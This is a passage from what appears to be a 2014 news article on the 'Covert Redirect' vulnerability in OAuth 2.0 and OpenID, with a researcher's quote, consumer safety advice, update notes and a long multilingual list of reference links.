“Given the trust users put in Facebook and other major OAuth providers I think it will be easy for attackers to trick people into giving some access to their personal information stored on those services,” he said.

Users who wish to avoid any potential loss of data should be careful about clicking links that immediately ask you to log in to Facebook or Google. Closing the tab immediately should prevent any redirection attacks.

While this issue isn’t as severe as Heartbleed, it’s relatively easy to do so unless the flaw gets patched, which according to Wang, is quite difficult to implement due to third-party sites having “little incentive” to fix the problem. Cost is a factor, as well as the view that the host company (such as Facebook) bears the responsibility for making the attacks appear more credible.

Update, 4:13 p.m. PT: adds statement from PayPal.

Update, 2:06 p.m. PT: adds further comment from LinkedIn.

(Mainly from Cnet.com)

References:

• 1．  http://it.people.com.cn/n/2014/0504/c1009-24969253.html．
• 2．  http://digi.163.com/14/0503/08/9RACJBK900162OUT.html
• 3 .    http://tech.ifeng.com/internet/detail_2014_05/03/36130721_0.shtml
• 4 .    http://www.cnbeta.com/articles/288503.htm
• 5 .    http://network.pconline.com.cn/471/4713896.html
• 6 .    http://www.hackdig.com/?05/hack-9782.htm
• 7 .    http://www.freebuf.com/vuls/33750.html   
• 8 .    http://www.csdn.net/article/2014-05-04/2819588
• 9 .    http://baike.baidu.com/link?url=0v9QZaGB09ePxHb70bzgWqlW-C9jieVguuDObtvJ_6WFY3h2vWnnjNDy4-jliDmqbT47SmdGS1_pZ4BbGN4Re_
• 10.     http://www.baike.com/wiki/%E9%9A%90%E8%94%BD%E9%87%8D%E5%AE%9A%E5%90%91%E6%BC%8F%E6%B4%9E
• 11,   http://www.cnet.com/news/serious-security-flaw-in-oauth-and-openid-discovered/
• 12.   http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/
• 13,   http://www.zdnet.com/student-who-exposed-covert-redirect-deflects-findings-away-from-id-protocols-7000029419/
• 14.   http://thehackernews.com/2014/05/nasty-covert-redirect-vulnerability.html
• 15.   http://news.yahoo.com/facebook-google-users-threatened-security-192547549.html 
• 16.   http://www.allsingaporestuff.com/article/white-hat-hackers-testing-security-computer-systems-singapore
• 17.   http://www.channelnewsasia.com/news/singapore/vigilantes-testing/1386694.html
• 18.   http://forums.hardwarezone.com.sg/eat-drink-man-woman-16/vigilantes-hacked-into-m1-iphone-website-4827334.html
• 19.   http://tetraph.com/covert_redirect/oauth2_openid_covert_redirect.html
• 20.   http://oauth.net/advisories/2014-1-covert-redirect/
• 21.   http://openid.net/2014/05/15/covert-redirect/
• 22.   http://oauth.jp/blog/2014/05/07/covert-redirect/
• 23.   http://blogs.mcafee.com/consumer/what-is-covert-redirect
• 24.   http://www.scmagazine.com/covert-redirect-vulnerability-impacts-oauth-20-openid/article/345407/
• 25.   http://www.securityweek.com/covert-redirect-issue-oauth-openid-places-security-responsibility-wrong-place
• 26.   http://oauth.jp/blog/2014/05/07/covert-redirect-in-implicit-flow/
• 27.   http://www.openid.or.jp/blog/2014/05/covert-redirect-and-its-real-impact-on-oauth-and-openid-connect.html
• 28.   http://weblog.bulknews.net/post/85008516879/covert-redirect-vulnerability-with-oauth-2
• 29.   http://securityaffairs.co/wordpress/24585/intelligence/covert-redirect-oauth-openid.html
• 30.   https://www.yireo.com/blog/1678-oauth-covert-redirect-vulnerability
• 31.   http://www.net-security.org/secworld.php?id=16795
• 32.   http://www.itbusinessedge.com/blogs/data-security/lessons-to-be-learned-from-covert-redirect.html
• 33.   http://www.netskope.com/blog/oauth-openid-covert-redirect-vulnerability/
• 34.   http://www.tomsguide.com/us/facebook-google-covert-redirect-flaw,news-18726.html
• 35.   http://zeenews.india.com/tags/covert-redirect.html
• 36.   http://www.foxnews.com/tech/2014/05/05/facebook-google-users-threatened-by-new-security-flaw/
• 37,   http://www.ceilers-news.de/serendipity/497-Websecurity-Die-Covert-Redirect-Schwachstelle-und-OAuth-2.0-und-OpenID.html
• 38.   http://www.reddit.com/r/technology/comments/24oe6q/nasty_covert_redirect_vulnerability_found_in/
• 39.   https://news.ycombinator.com/item?id=7685677
• 40.   http://canaltech.com.br/noticia/seguranca/Diferencas-entre-Covert-Redirect-e-Heartbleed/
• 41.   https://www.idradar.com/news-stories/technology/Covert-Redirect-Software-Bug-Needs-A-Fix
• 42.   http://www.komando.com/happening-now/251360/a-new-security-hole-lets-hackers-hijack-your-facebook-login/all
• 43.   http://www.hardware.no/artikler/covert-redirect-svakhet-er-ingen-ny-nettkrise/159589
• 44.   http://www.sotostips.gr/2014/05/provlima-covert-redirect.html
• 45.   http://www.darkreading.com/security-flaw-found-in-oauth-20-and-openid-third-party-authentication-at-risk/d/d-id/1235062
• 46.   http://twit.tv/show/tech-news-2night/79
• 47.   http://www.baomoi.com/Bkav-Lo-hong-Covert-Redirect-khong-nguy-hiem-bang-trai-tim-ri-mau/76/13729018.epi
• 48.   http://www.darraghduffy.ie/covert-redirect-openid-oauth/
• 49.   http://conectica.com.mx/2014/05/02/covert-redirect-vulnerabilidad-en-oauth-y-openid-similar-heartbleed/
• 50.   http://blog.infinity-solutions.jp/2014/05/06/the-next-heartbleed-bug-covert-redirect-flaw/
• 51.   … …